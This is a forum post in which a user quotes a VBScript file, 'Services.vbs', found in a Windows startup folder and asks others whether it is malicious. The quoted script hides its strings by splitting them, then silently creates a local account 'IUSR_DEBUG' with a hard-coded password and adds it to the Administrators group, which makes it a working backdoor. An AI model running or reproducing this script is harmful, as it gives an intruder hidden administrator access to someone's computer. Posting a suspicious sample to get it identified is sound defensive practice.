I have the basic idea of what this is doing. But I'm wondering if someone can put this in plain English and tell me if it might be bad, or what it looks like to you. The file is called "Services.vbs" and ended up in someone's startup, as in, the start menu startup. And it's not a shortcut, but the actual script is IN this startup folder. Here is the code in the script: Code: set wshshell=createobject ("wsc"&"ript.shell" ) a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IUSR_D"&"EBUG zf,@"&"yjk515 /a"&"dd",0) b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IUSR_"&"DEBUG /a"&"dd",0) This might be a part of .NET framework, or perhaps a Microsoft Beta program, or their new "Express" programming tools. I don't know, but it appeared and I've got mixed feelings about it. What do you think?